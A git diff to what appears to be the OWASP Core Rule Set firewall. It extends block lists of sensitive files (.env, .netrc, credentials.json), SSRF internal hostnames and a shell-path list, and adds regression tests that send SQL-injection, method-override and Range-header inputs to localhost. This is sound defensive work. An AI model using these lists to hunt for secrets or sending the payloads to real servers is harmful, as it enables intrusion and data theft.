sys/hypervisor sys/kernel sys/module sys/power +/sys/ + +# Vite.js development server endpoints (CVE-2025-30208) +# These endpoints allow arbitrary file system access and should never be exposed +/@fs/ +/@id/ diff --git a/rules/restricted-upload.data b/rules/restricted-upload.data index 7ad5df7abe..897370e11e 100644 --- a/rules/restricted-upload.data +++ b/rules/restricted-upload.data @@ -14,14 +14,22 @@ # }' rules/restricted-files.data | sort | uniq > "$tmpfile" # crs-toolchain util fp-finder "$tmpfile" -e english-extended.txt >> rules/restricted-upload.data # rm -f "$tmpfile" english-extended.txt +.DS_Store +.access/ .addressbook .bash_ .bashrc .boto .bowerrc +.cache/ +.config.local.php +.coverage +.coveralls.yml +.credentials .cshrc +.cvs .deployment-secrets.txt -.DS_Store +.dockerignore .env .envrc .eslintignore @@ -29,6 +37,7 @@ .fbcindex .fish .forward +.ftpconfig .gitattributes .gitconfig .gitignore @@ -37,10 +46,12 @@ .gitmodules .google_authenticator .hgignore +.history .htaccess .htdigest .htpasswd .idea +.ipynb_checkpoints/ .jshintrc .ksh_history .lesshst @@ -48,7 +59,9 @@ .lighttpdpassword .lldb-history .lynx_cookies +.msmtprc .my.cnf +.myscmserverinfo .mysql_history .nano_history .netrc @@ -57,6 +70,9 @@ .nsconfig .nsr .oh-my- +.pac +.pass +.passwd .password-store .pearrc .pgpass @@ -69,11 +85,17 @@ .procmailrc .profile .psql_history +.pwd +.pytest_cache/ .python_history .rediscli_history +.remote-sync.json .rhistory .rhosts +.s3cfg +.secrets .selected_editor +.settings/ .sh_history .sql.001 .sql.7z @@ -110,13 +132,17 @@ .sqlite_history .svnignore .tcshrc +.terraform.lock.hcl +.terraform/ .tmux.conf +.tools/ .travis.yaml .travis.yml .user.ini .viminfo .vimrc .vscode +.web.config.swp .wget-hsts .ws_ftp.ini .www_acl @@ -127,6 +153,12 @@ .zsh_history .zshenv .zshrc +BlockCypher.log + + + + +__pycache__/ acpi asound auth.json @@ -134,7 +166,7 @@ aws-key.yaml aws-key.yml aws.yaml aws.yml -BlockCypher.log +boot.ini bootconfig bower.json buddyinfo @@ -226,6 +258,7 @@ config.prod.yml config.py config.rb config.sample.asp +config.sample.inc.php config.sample.ini config.sample.json config.sample.php @@ -302,9 +335,13 @@ config_test.txt config_test.xml config_test.yaml config_test.yml +coverage.xml cpuinfo +credentials.json database.yaml database.yml +debian.cnf +debug.log default.settings.php defaults.inc.php Desktop.ini @@ -315,9 +352,13 @@ env.php execdomains filesystems fish_variables +ftp-sync.json +gitlab.rb +gitlab_config_ gruntfile.js hplip.conf hypervisor +initial_root_password iomem ioports ipmi @@ -335,6 +376,9 @@ local.xml mdstat meminfo mtrr +my.cnf +mysql.cnf +mysqldump.cnf notify-osd.log npm-debug.log npm-shrinkwrap.json @@ -350,21 +394,26 @@ php_errors.log phpcs.xml phpcs.xml.dist phpinfo.php +pm2.log routing.yml sched_debug schedstat scsi secrets.json +secrets.yaml +secrets.yml security.yml sendgrid.env services.yml settings.inc.php settings.local.php settings.php +sftp.json slabinfo softirqs sslvpn_websession sysrq-trigger +system.ini sysvipc thread-self Thumbs.db @@ -377,8 +426,11 @@ vmstat Web.config weblogic.xml webpack.config.js +win.ini wp-config- wp-config. wp-config_ +yarn-debug.log +yarn-error.log yarn.lock zoneinfo diff --git a/rules/scanners-user-agents.data b/rules/scanners-user-agents.data index 91a3938238..4f9ddf2d03 100644 --- a/rules/scanners-user-agents.data +++ b/rules/scanners-user-agents.data @@ -61,6 +61,9 @@ morfeus # https://trunc.org/learning/the-mozlila-user-agent-bot Mozlila +# Typo of Mozilla/5.0 user-agent +Mozilla/5.g + # Nessus # http://www.tenable.com/products/nessus-vulnerability-scanner nessus diff --git a/rules/ssrf-no-scheme.data b/rules/ssrf-no-scheme.data new file mode 100644 index 0000000000..d1bb9e2da8 --- /dev/null +++ b/rules/ssrf-no-scheme.data @@ -0,0 +1,35 @@ +# SSRF patterns without schemes +# +# This file contains localhost and internal DNS names that are commonly used +# in SSRF attacks. These patterns are checked without URI schemes to catch +# cases where frameworks automatically prepend 'http://' or 'https://'. +# +# Sources: +# - https://gist.githubusercontent.com/jhaddix/78cece26c91c6263653f31ba453e273b/raw/a4869d58a5ce337d1465c2d1b29777b9eecd371f/cloud_metadata.txt +# - https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +# - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery +# - https://github.com/assetnote/blind-ssrf-chains +# - https://github.com/coreruleset/coreruleset/issues/4427 + +# Standard hosts aliases +localhost/ +localhost.localdomain/ +localhost4/ +localhost4.localdomain4/ +ipv6-localhost/ +ip6-loopback/ + +# Docker based aliases +host.docker.internal/ +gateway.docker.internal/ +kubernetes.docker.internal/ + +# Podman +host.containers.internal/ + +# K8s API local service +kubernetes.default.svc.cluster.local/ + +# Testing services +localtest.me/ +lvh.me/ diff --git a/rules/ssrf.data b/rules/ssrf.data index ab1048900e..d37b969972 100644 --- a/rules/ssrf.data +++ b/rules/ssrf.data @@ -53,6 +53,7 @@ http://[0:0:0:0:0:ffff:127.0.0.1] http://0/ http://127.1 http://127.0.1 +http:127.0.0.1 # AWS ECS http://169.254.170.2/v2 diff --git a/rules/unix-shell.data b/rules/unix-shell.data index 499dba3469..6de8f5c77a 100644 --- a/rules/unix-shell.data +++ b/rules/unix-shell.data @@ -586,6 +586,7 @@ bin/touch bin/traceroute bin/traceroute6 bin/troff +bin/trap bin/tshark bin/ul bin/ulimit diff --git a/tests/TESTS_EXCLUSIONS b/tests/TESTS_EXCLUSIONS index e0ec0d9648..9cc47c7161 100644 --- a/tests/TESTS_EXCLUSIONS +++ b/tests/TESTS_EXCLUSIONS @@ -1,3 +1,13 @@ +# This file defines rules that are expected to fail the "rules without tests" lint check. +# These are mainly administrative rules. +# +# Lines starting with `#` are considered comments. +# Every non-empty, non-commented line is expected to be a rule number (e.g. 123456) or +# rule number prefix (e.g., 1234, or 12). Prefixes will match all rules IDs with the same prefix. +# The linter will skip the "rules without tests" lint check for any matching rule ID. +# +# See https://github.com/coreruleset/crs-linter for reference. + # crs-setup.conf.example 1234 900 @@ -8,6 +18,9 @@ 949 # 921170 prepares 921180 921170 +# 922140 and 922150 prepares 922110 +922140 +922150 # 942441 is an exclusion rule 942441 # 942442 is an exclusion rule diff --git a/tests/docker-compose.yml b/tests/docker-compose.yml index 9675f265cb..9b2ad8b1c1 100644 --- a/tests/docker-compose.yml +++ b/tests/docker-compose.yml @@ -36,7 +36,7 @@ x-nginx-env: &nginx-env services: modsec2-apache: &apache container_name: modsec2-apache - image: owasp/modsecurity-crs:apache@sha256:f2523fbe1bc500399901f5e18ddd1b3cf1a653d7bfae4f12e80a077f3256dee5 + image: owasp/modsecurity-crs:apache@sha256:fc147eb3e1ab626b0c693222d87005f6cf647cea58613b47e360c18943fed35f # NOTE: The user used to run the container process is explicitly set to # 'root'. This fixes issues with permissions on the logging directories used @@ -66,7 +66,7 @@ services: modsec3-nginx: &nginx container_name: modsec3-nginx - image: owasp/modsecurity-crs:nginx@sha256:f7d39903fca30e5af4c741929de2c276e19bc63c91669ab8466c20a36dc9d9bd + image: owasp/modsecurity-crs:nginx@sha256:eb7fa46bea1fa2e2d83793058cea4152ca0895cf6ad15d52a6ebe7f26bef900c # NOTE: The user used to run the container process is explicitly set to # 'root'. This fixes issues with permissions on the logging directories used # as bind mounts. This is done as *a convenience for running the CRS testing diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index ea1805173c..30a31a8274 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -94,6 +94,9 @@ test_overrides: output: log: no_expect_ids: [933110] + - rule_id: 933220 + test_ids: [2, 4] + reason: "Nginx ignore by default request header with invalid characters (like X_Filename or X.Filename)" - rule_id: 934131 test_ids: [5] reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index 86df272810..e557ef8acc 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml @@ -40,20 +40,3 @@ tests: output: log: expect_ids: [920190] - - test_id: 3 - desc: "Status Page Test - Request-Range header field with range end less than range start" - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Request-Range: bytes=64-0 - uri: "/" - version: "HTTP/1.1" - output: - log: - expect_ids: [920190] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index dc322f3866..59a23c9a61 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml @@ -18,23 +18,7 @@ tests: output: log: expect_ids: [920200] - - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php - test_id: 2 - stages: - - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log: - expect_ids: [920200] - - test_id: 3 + - test_id: 2 stages: - input: dest_addr: "127.0.0.1" @@ -49,7 +33,7 @@ tests: output: log: no_expect_ids: [920200] - - test_id: 4 + - test_id: 3 stages: - input: dest_addr: "127.0.0.1" @@ -64,7 +48,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 5 + - test_id: 4 stages: - input: dest_addr: "127.0.0.1" @@ -79,7 +63,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 6 + - test_id: 5 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: - input: @@ -100,7 +84,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 7 + - test_id: 6 desc: This should PASS (PL2) stages: - input: @@ -117,7 +101,7 @@ tests: output: log: no_expect_ids: [920200] - - test_id: 8 + - test_id: 7 desc: "This should FAIL with rule 920200 (PL2)" stages: - input: @@ -134,7 +118,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 9 + - test_id: 8 desc: This should PASS (PL2) stages: - input: @@ -151,7 +135,7 @@ tests: output: log: no_expect_ids: [920200] - - test_id: 10 + - test_id: 9 desc: This should PASS (PL2) stages: - input: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml index 416a7774ff..7fbc42b899 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml @@ -408,3 +408,39 @@ tests: output: log: expect_ids: [920420] + - test_id: 21 + desc: "Positive test: Ensure that the content type application/csp-report is not allowed by the default configuration" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: application/csp-report + method: POST + port: 80 + uri: "/" + data: '{"foo":"bar"}' + version: HTTP/1.1 + output: + log: + expect_ids: [920420] + - test_id: 22 + desc: "Positive test: Ensure that the content type application/reports+json is not allowed by the default configuration" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: application/reports+json + method: POST + port: 80 + uri: "/" + data: '{"foo":"bar"}' + version: HTTP/1.1 + output: + log: + expect_ids: [920420] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920640.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920640.yaml new file mode 100644 index 0000000000..47389347ca --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920640.yaml @@ -0,0 +1,196 @@ +--- +meta: + author: "fzipi" + description: "920640 must detect requests that have a request body but no `Content-Type` header" +rule_id: 920640 +tests: + - test_id: 1 + desc: POST request with body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: "33" + Accept: "*/*" + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 2 + desc: POST request with body and proper Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/json" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + output: + log: + no_expect_ids: [920640] + - test_id: 3 + desc: GET request without body (negative test) + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920640] + - test_id: 4 + desc: | + POST request with body but empty Content-Type header value. + For now, the test requires to have CL header for HTTP/1.1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "" + Content-Length: "33" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 5 + desc: | + POST request with body, no Content-Length and no Content-Type headers. + This will fail in the current HTTP/1.1 implementation, + but HTTP2 and up will work as the binary protocol will + have the proper length in the data. + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + autocomplete_headers: false + output: + status: [400] + - test_id: 6 + desc: POST request with simple text body and no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "9" + uri: "/test" + version: "HTTP/1.1" + data: "test_data" + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 7 + desc: POST request with XML body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "46" + uri: "/api" + version: "HTTP/1.1" + data: '123' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 8 + desc: PUT request with body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "PUT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "18" + uri: "/resource/1" + version: "HTTP/1.1" + data: '{"name":"updated"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 9 + desc: POST request with Content-Length 0 (negative test - no actual body) + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: 0 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/test" + version: "HTTP/1.1" + autocomplete_headers: false + output: + log: + no_expect_ids: [920640] + - test_id: 10 + desc: PATCH request with body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "PATCH" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "46" + uri: "/resource/1" + version: "HTTP/1.1" + data: '{"op":"replace","path":"/name","value":"test"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920650.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920650.yaml new file mode 100644 index 0000000000..60d9f7f34a --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920650.yaml @@ -0,0 +1,601 @@ +--- +meta: + author: "fzipi" + description: "Tests for HTTP method override via _method parameter detection (920650)" + +rule_id: 920650 + +tests: + # + # Positive tests - should trigger + # + + # Standard dangerous methods (uppercase) + - test_id: 1 + desc: "DELETE method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 2 + desc: "PUT method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=PUT" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 3 + desc: "PATCH method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=PATCH" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 4 + desc: "OPTIONS method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=OPTIONS" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 5 + desc: "TRACE method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=TRACE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 6 + desc: "CONNECT method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=CONNECT" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 7 + desc: "HEAD method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=HEAD" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Lowercase methods (case insensitivity test) + - test_id: 8 + desc: "Lowercase delete method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=delete" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 9 + desc: "Mixed case Delete method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=Delete" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Request body methods (POST with form data) + - test_id: 10 + desc: "DELETE method override in POST body" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "_method=DELETE&id=123" + output: + log: + expect_ids: [920650] + + - test_id: 11 + desc: "PUT method override in POST body" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "_method=PUT&name=test" + output: + log: + expect_ids: [920650] + + # GET request with _method (SameSite bypass scenario) + - test_id: 12 + desc: "POST method override via GET request (CSRF bypass)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/transfer?amount=1000&_method=POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # WebDAV methods + - test_id: 13 + desc: "PROPFIND WebDAV method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/webdav/file?_method=PROPFIND" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 14 + desc: "PROPPATCH WebDAV method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/webdav/file?_method=PROPPATCH" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 15 + desc: "MKCOL WebDAV method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/webdav/folder?_method=MKCOL" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Minimum length methods (3 chars) + - test_id: 16 + desc: "GET method override (3 chars - minimum)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=GET" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 17 + desc: "PUT method override (3 chars)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/api/resource?_method=PUT" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Maximum length methods (10 chars) + - test_id: 18 + desc: "ABCDEFGHIJ method override (10 chars - maximum)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=ABCDEFGHIJ" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # + # Negative tests - should NOT trigger + # + + # Too short (less than 3 characters) + - test_id: 19 + desc: "Negative - 2 character value (too short)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=AB" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 20 + desc: "Negative - 1 character value (too short)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=X" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Too long (more than 10 characters) + - test_id: 21 + desc: "Negative - 11 character value (too long)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=ABCDEFGHIJK" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 22 + desc: "Negative - UNSUBSCRIBE (11 chars - too long)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=UNSUBSCRIBE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Contains non-alpha characters + - test_id: 23 + desc: "Negative - Contains digit" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=DELETE1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 24 + desc: "Negative - Contains hyphen" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=X-DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 25 + desc: "Negative - Contains underscore" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=DO_DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 26 + desc: "Negative - Contains space" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "_method=DEL ETE" + output: + log: + no_expect_ids: [920650] + + # Empty or missing value + - test_id: 27 + desc: "Negative - Empty _method value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Different parameter name + - test_id: 28 + desc: "Negative - method parameter (not _method)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?method=DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 29 + desc: "Negative - http_method parameter" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?http_method=DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Normal requests without _method + - test_id: 30 + desc: "Negative - Normal GET request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/api/users/123" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 31 + desc: "Negative - Normal POST request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/users" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "name=test&email=test@example.com" + output: + log: + no_expect_ids: [920650] + + # Non-method-like values + - test_id: 32 + desc: "Negative - Numeric value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=12345" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 33 + desc: "Negative - Mixed alphanumeric" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=abc123def" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Configuration bypass test (when tx.allow_method_override_parameter=1) + # Note: This test verifies behavior when the configuration allows _method + # The actual bypass depends on the rule chain checking tx.allow_method_override_parameter + - test_id: 34 + desc: "Edge case - _method with URL-encoded value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=%44%45%4C%45%54%45" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Multiple parameters + - test_id: 35 + desc: "DELETE method with other parameters" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?id=123&_method=DELETE&confirm=true" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920660.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920660.yaml new file mode 100644 index 0000000000..af7dc93ce9 --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920660.yaml @@ -0,0 +1,541 @@ +--- +meta: + author: "fzipi" + description: "Tests for obsolete Request-Range header detection (920660)" + +rule_id: 920660 + +tests: + # + # Positive tests - should trigger + # + + # Basic Request-Range header presence + - test_id: 1 + desc: "Request-Range header with simple byte range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/document.pdf" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-1023" + output: + log: + expect_ids: [920660] + + - test_id: 2 + desc: "Request-Range header with open-ended range" + stages: + - input: + 